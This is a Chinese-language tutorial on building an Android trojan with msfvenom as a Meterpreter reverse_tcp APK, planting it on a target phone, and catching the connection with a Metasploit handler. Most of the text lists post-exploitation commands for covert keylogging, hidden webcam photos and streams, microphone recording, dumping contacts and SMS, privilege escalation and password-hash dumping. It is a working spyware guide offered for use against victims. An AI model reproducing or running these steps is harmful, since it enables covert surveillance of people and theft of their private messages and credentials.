安卓木马的生成

简介: 安卓木马的生成

keyscan_start:开始键盘记录

keyscan_dump:下载键盘记录

keyscan_stop:结束键盘记录

 

record_mic:录制声音(如果目标主机上有话筒的话)

webcam_chat:查看摄像头接口

 

webcam_stream  //开启摄像头

 

webcam_list:查看摄像头列表

webcam_snap //隐秘拍照功能

 

webcam_snap 隐秘拍照功能 -i 1 或者2是开启前置摄像头和后置摄像头的

 

run vnc:开启远程桌面

dump_contacts //导出电话号码

dump_sms  //导出信息

 

 

enumdesktops    -->列出所有可访问的桌面和窗口站(窗体列表)

 

getdesktop      -->得到当前的Meterpreter桌面

 

idletime        -->返回秒远程用户已经闲置数量

 

keyscan_dump    -->转储按键缓冲(下载键盘记录)

 

keyscan_start   -->开始捕获击键(开始键盘记录)

 

keyscan_stop    -->停止捕获击键(停止键盘记录)

 

screenshot      -->抓取交互式桌面截图(当前操作界面截图一张)

 

setdesktop      -->改变meterpreters当前桌面

 

uictl           -->控制一些用户界面组件(获取键盘、鼠标控制权)

 

使用uictl -h 查看帮助(打开/关闭,键盘/鼠标)

 

PS:键盘记录注意点,先开始,后下载,再结束,否则会出错

 

摄像头:Stdapi: Webcam Commands(摄像头命令)

 

record_mic       -->X秒从默认的麦克风record_mic音频记录(音频录制)

 

webcam_chat      -->开始视频聊天(视频,对方会有弹窗)

 

webcam_list      -->单摄像头(查看摄像头列表)

 

webcam_snap      -->采取快照从指定的摄像头(摄像头拍摄一张照片)

 

webcam_stream    -->播放视频流从指定的摄像头(开启摄像头监控)

 

其他命令操作

 

getsystem        -->获取高权限

 

hashdump         -->获取当前用户hash

 

 

 

msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R >

/root/apk.apk

-p 指定payload       r指定存放路径

木马生成好了之后上传到目标手机上

 

msfconsole

然后启动msf:msfconsole  然后输入命令:

1.use exploit/multi/handler   //加载模块

 

2. set payload android/meterpreter/reverse_tcp   //选择Payload

 

3.show options   //查看参数设置

 

这个payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置

 

1.set LHOST 192.168.1.114   //这里的地址设置成我们刚才生成木马的IP地址

 

2.set LPORT 5555   //这里的端口设置成刚才我们生成木马所监听的端口

 

3.run   //开始执行漏洞 开始监听,等待手机上线

 

查看摄像头个数:webcam_list

下载短信:dump_sms

查看手机版本:sysinfo

拍照:webcom_suap -i 1 (1是后摄

重新连接:run

webcam_stream -i 1 开启视频,1是后摄

相关文章
|
人工智能 算法 机器人
字节Coze优缺点分析
【2月更文挑战第16天】字节Coze优缺点分析
3306 2
字节Coze优缺点分析
|
存储 NoSQL Ubuntu
在Ubuntu上安装Redis并学习使用get、set和keys命令
在Ubuntu上安装Redis并学习使用get、set和keys命令
|
2月前
|
人工智能 安全 机器人
快手封号人工解封?是真吗
一、平台封禁机制的技术原理 快手采用"AI识别+人工复核"的双层审核体系:
|
机器学习/深度学习 人工智能 编解码
深入探索AI文生语音技术的奥秘:从文本输入到逼真语音输出的全链条语音合成过程解析
【9月更文挑战第2天】深入探索AI文生语音技术的奥秘:从文本输入到逼真语音输出的全链条语音合成过程解析
 深入探索AI文生语音技术的奥秘:从文本输入到逼真语音输出的全链条语音合成过程解析
|
4月前
|
Kubernetes Cloud Native 调度
《分布式任务调度框架深度对比:Quartz/XXL-JOB/Elastic-Job/PowerJob选型指南》​
根据IDC预测,到2025年全球将有75%的企业任务调度系统需要重构以适应云原生架构。技术雷达监测:定期关注CNCF技术趋势报告渐进式改造:从非核心业务开始验证新框架人才储备:重点培养具备K8s Operator开发能力的调度专家评估现有系统的云原生适配度在测试环境部署PowerJob 4.3.3参与CNCF调度技术社区讨论制定6个月框架迁移路线图(注:本文数据来自各框架官方路线图、CNCF年度报告及笔者压力测试结果,转载请保留出处)
965 0
|
10月前
|
安全 算法 Linux
Linux 服务器还有漏洞?建议使用 OpenVAS 日常检查!
在数字化时代,Linux 服务器的安全至关重要。OpenVAS 是一款优秀的开源漏洞扫描工具,可以帮助及时发现并修复服务器中的安全隐患。本文将介绍 OpenVAS 的主要功能、使用方法及应对漏洞的措施,帮助用户加强服务器安全管理,确保企业数字化安全。
349 7
|
Ubuntu Linux Python
Failed to process package ‘cartographer_ros‘ :
Failed to process package ‘cartographer_ros‘ :
Failed to process package ‘cartographer_ros‘ :
|
11月前
|
存储 监控 安全
贴片卡的应用场景
贴片卡,通常指的是尺寸小巧、可以直接贴在或嵌入到产品、设备或表面的卡片或芯片,它们集成了电路、存储器、微处理器等电子元件。这些卡片广泛应用于多个行业和领域,以实现数据的存储、传输、认证或控制等功能。以下是贴片卡的一些主要应用场景:
|
Rust 算法 数据安全/隐私保护
【密码学】一文读懂RSA的随机数生成器
本文接着来聊一个比较轻松的内容,再来说一个随机数生成器,对于这个随机数生成器呢,这里和之前讲到过的BBS有一些类似,直接来看具体的内容蛤。
1309 1
【密码学】一文读懂RSA的随机数生成器
|
SQL 存储 测试技术
SQL Server 查询超时问题排查
【8月更文挑战第14天】遇到SQL Server查询超时,先检查查询复杂度与索引使用;审视服务器CPU、内存及磁盘I/O负载;审查SQL Server配置与超时设置;检测锁和阻塞状况;最后审查应用代码与网络环境。每步定位问题根源,针对性优化以提升查询效率。务必先行备份并在测试环境验证改动。
902 0